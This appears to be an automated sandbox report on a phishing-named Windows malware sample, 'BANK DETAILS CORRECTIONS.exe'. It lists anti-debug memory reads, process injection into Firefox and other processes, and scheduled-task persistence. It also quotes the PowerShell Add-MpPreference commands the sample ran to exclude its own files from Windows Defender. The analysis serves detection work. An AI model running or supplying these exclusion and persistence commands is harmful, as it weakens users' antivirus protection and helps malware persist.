                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195C8F9 mov eax, dword ptr fs:[00000030h]12_2_0195C8F9
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EA8E4 mov eax, dword ptr fs:[00000030h]12_2_019EA8E4
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AC810 mov eax, dword ptr fs:[00000030h]12_2_019AC810
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942835 mov eax, dword ptr fs:[00000030h]12_2_01942835
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942835 mov eax, dword ptr fs:[00000030h]12_2_01942835
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942835 mov eax, dword ptr fs:[00000030h]12_2_01942835
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942835 mov ecx, dword ptr fs:[00000030h]12_2_01942835
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942835 mov eax, dword ptr fs:[00000030h]12_2_01942835
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01942835 mov eax, dword ptr fs:[00000030h]12_2_01942835
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A830 mov eax, dword ptr fs:[00000030h]12_2_0195A830
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C483A mov eax, dword ptr fs:[00000030h]12_2_019C483A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C483A mov eax, dword ptr fs:[00000030h]12_2_019C483A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01950854 mov eax, dword ptr fs:[00000030h]12_2_01950854
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924859 mov eax, dword ptr fs:[00000030h]12_2_01924859
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924859 mov eax, dword ptr fs:[00000030h]12_2_01924859
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AE872 mov eax, dword ptr fs:[00000030h]12_2_019AE872
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AE872 mov eax, dword ptr fs:[00000030h]12_2_019AE872
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B6870 mov eax, dword ptr fs:[00000030h]12_2_019B6870
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B6870 mov eax, dword ptr fs:[00000030h]12_2_019B6870
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930BBE mov eax, dword ptr fs:[00000030h]12_2_01930BBE
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930BBE mov eax, dword ptr fs:[00000030h]12_2_01930BBE
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D4BB0 mov eax, dword ptr fs:[00000030h]12_2_019D4BB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D4BB0 mov eax, dword ptr fs:[00000030h]12_2_019D4BB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CEBD0 mov eax, dword ptr fs:[00000030h]12_2_019CEBD0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01940BCB mov eax, dword ptr fs:[00000030h]12_2_01940BCB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01940BCB mov eax, dword ptr fs:[00000030h]12_2_01940BCB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01940BCB mov eax, dword ptr fs:[00000030h]12_2_01940BCB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920BCD mov eax, dword ptr fs:[00000030h]12_2_01920BCD
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920BCD mov eax, dword ptr fs:[00000030h]12_2_01920BCD
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920BCD mov eax, dword ptr fs:[00000030h]12_2_01920BCD
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928BF0 mov eax, dword ptr fs:[00000030h]12_2_01928BF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928BF0 mov eax, dword ptr fs:[00000030h]12_2_01928BF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928BF0 mov eax, dword ptr fs:[00000030h]12_2_01928BF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194EBFC mov eax, dword ptr fs:[00000030h]12_2_0194EBFC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019ACBF0 mov eax, dword ptr fs:[00000030h]12_2_019ACBF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199EB1D mov eax, dword ptr fs:[00000030h]12_2_0199EB1D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194EB20 mov eax, dword ptr fs:[00000030h]12_2_0194EB20
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194EB20 mov eax, dword ptr fs:[00000030h]12_2_0194EB20
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E8B28 mov eax, dword ptr fs:[00000030h]12_2_019E8B28
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E8B28 mov eax, dword ptr fs:[00000030h]12_2_019E8B28
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CEB50 mov eax, dword ptr fs:[00000030h]12_2_019CEB50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D4B4B mov eax, dword ptr fs:[00000030h]12_2_019D4B4B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D4B4B mov eax, dword ptr fs:[00000030h]12_2_019D4B4B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B6B40 mov eax, dword ptr fs:[00000030h]12_2_019B6B40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B6B40 mov eax, dword ptr fs:[00000030h]12_2_019B6B40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C8B42 mov eax, dword ptr fs:[00000030h]12_2_019C8B42
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019EAB40 mov eax, dword ptr fs:[00000030h]12_2_019EAB40
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191CB7E mov eax, dword ptr fs:[00000030h]12_2_0191CB7E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01958A90 mov edx, dword ptr fs:[00000030h]12_2_01958A90
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192EA80 mov eax, dword ptr fs:[00000030h]12_2_0192EA80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4A80 mov eax, dword ptr fs:[00000030h]12_2_019F4A80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928AA0 mov eax, dword ptr fs:[00000030h]12_2_01928AA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928AA0 mov eax, dword ptr fs:[00000030h]12_2_01928AA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01976AA4 mov eax, dword ptr fs:[00000030h]12_2_01976AA4
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920AD0 mov eax, dword ptr fs:[00000030h]12_2_01920AD0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01954AD0 mov eax, dword ptr fs:[00000030h]12_2_01954AD0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01954AD0 mov eax, dword ptr fs:[00000030h]12_2_01954AD0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01976ACC mov eax, dword ptr fs:[00000030h]12_2_01976ACC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01976ACC mov eax, dword ptr fs:[00000030h]12_2_01976ACC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01976ACC mov eax, dword ptr fs:[00000030h]12_2_01976ACC
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195AAEE mov eax, dword ptr fs:[00000030h]12_2_0195AAEE
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195AAEE mov eax, dword ptr fs:[00000030h]12_2_0195AAEE
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019ACA11 mov eax, dword ptr fs:[00000030h]12_2_019ACA11
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01944A35 mov eax, dword ptr fs:[00000030h]12_2_01944A35
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01944A35 mov eax, dword ptr fs:[00000030h]12_2_01944A35
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CA38 mov eax, dword ptr fs:[00000030h]12_2_0195CA38
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CA24 mov eax, dword ptr fs:[00000030h]12_2_0195CA24
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194EA2E mov eax, dword ptr fs:[00000030h]12_2_0194EA2E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h]12_2_01926A50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h]12_2_01926A50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h]12_2_01926A50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h]12_2_01926A50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h]12_2_01926A50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h]12_2_01926A50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01926A50 mov eax, dword ptr fs:[00000030h]12_2_01926A50
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930A5B mov eax, dword ptr fs:[00000030h]12_2_01930A5B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930A5B mov eax, dword ptr fs:[00000030h]12_2_01930A5B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199CA72 mov eax, dword ptr fs:[00000030h]12_2_0199CA72
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199CA72 mov eax, dword ptr fs:[00000030h]12_2_0199CA72
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CA6F mov eax, dword ptr fs:[00000030h]12_2_0195CA6F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CA6F mov eax, dword ptr fs:[00000030h]12_2_0195CA6F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CA6F mov eax, dword ptr fs:[00000030h]12_2_0195CA6F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019CEA60 mov eax, dword ptr fs:[00000030h]12_2_019CEA60
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CDB1 mov ecx, dword ptr fs:[00000030h]12_2_0195CDB1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CDB1 mov eax, dword ptr fs:[00000030h]12_2_0195CDB1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195CDB1 mov eax, dword ptr fs:[00000030h]12_2_0195CDB1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01948DBF mov eax, dword ptr fs:[00000030h]12_2_01948DBF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01948DBF mov eax, dword ptr fs:[00000030h]12_2_01948DBF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E8DAE mov eax, dword ptr fs:[00000030h]12_2_019E8DAE
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E8DAE mov eax, dword ptr fs:[00000030h]12_2_019E8DAE
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4DAD mov eax, dword ptr fs:[00000030h]12_2_019F4DAD
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01956DA0 mov eax, dword ptr fs:[00000030h]12_2_01956DA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeMemory written: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeMemory written: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000 value starts with: 4D5A
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeSection loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: read write
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\sdiagnhost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\sdiagnhost.exeThread APC queued: target process: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\sdiagnhost.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmpJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeProcess created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeProcess created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exeJump to behavior
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exeJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exeProcess created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
